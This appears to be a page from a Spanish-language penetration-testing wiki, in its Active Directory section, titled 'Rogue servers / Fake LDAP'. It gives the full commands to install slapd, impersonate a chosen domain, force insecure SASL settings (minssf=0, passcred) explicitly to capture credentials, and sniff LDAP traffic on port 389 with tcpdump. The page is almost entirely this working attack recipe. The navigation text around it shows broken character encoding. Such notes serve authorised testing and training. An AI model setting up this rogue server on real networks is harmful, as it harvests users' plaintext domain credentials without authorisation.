Grimorio de XTORMIN
Xtormin GithubLinkedIn
  • Home
  • 馃IA / AI
    • Investigaci贸n y automatizaci贸n
  • 馃彚Pentesting en Infraestructuras
    • Intrusi贸n f铆sica
    • Redes Wi-Fi
      • Herramientas
      • Metodolog铆a de Pentest Wifi
      • WEP
      • WPA2-PSK / Red personal
      • WPA2-MGT / Red corporativa
    • Cloud
      • 馃敺Azure
        • Herramientas
        • Metodolog铆a de Azure Pentest
        • AzureAD
        • Az Powershell
        • Az Cli
        • Portal de Azure
    • Per铆metro
      • Acceso remoto
    • Red interna
      • Windows
      • Active directory
        • Enumeraci贸n manual
    • Servicios
      • FTP - 21/tcp
      • SSH - 22/tcp
      • DNS - 53/UDP
      • SMB - 135, 445 /tcp
      • SNMP - 161, 162, 10161, 10162/udp
      • IPMI - 623/udp/tcp
      • RDP - 3389/TCP
      • Redis - 6379/tcp
    • Misc
      • Transferencia de ficheros
  • 馃寪Pentesting en aplicaciones web
    • General
      • Ataques y vulnerabilidades
        • Autenticaci贸n
          • Vulnerabilidades JWT
        • Javascript
          • XSS
          • Contaminaci贸n de prototipos - Prototype pollution
        • GraphQL
      • Explotaci贸n
        • Webshell
    • Tecnolog铆a
      • Jenkins
      • Salesforce
  • 鈿掞笍Herramientas comunes
    • Recursos generales
    • Nmap
    • Nuclei
    • BloodHound
  • 馃懢MISC
    • [ Kali ] Setup
      • VPN
Con tecnolog铆a de GitBook
En esta p谩gina

驴Te fue 煤til?

  1. Pentesting en Infraestructuras
  2. Red interna
  3. Active directory

Rogue servers

Fake LDAP

sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd
sudo dpkg-reconfigure -p low slapd

Configurar el nombre de dominio que se desee "suplantar".

Crear el fichero que luego se usar谩 para cargar la configuraci贸n en el servicio LDAP:

vim olcSaslSecProps.ldif 

Establecer una configuraci贸n insegura para la captura de credenciales usando la siguiente config:

#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

Cargar la configuraci贸n en el servicio y reiniciarlo para que haga efecto:

sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif
sudo systemctl restart slapd

Comprobar configuraci贸n:

ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms

Capturar paquetes con tcpdump:

sudo tcpdump -SX -i breachad tcp port 389

脷ltima actualizaci贸n hace 1 mes

驴Te fue 煤til?

馃彚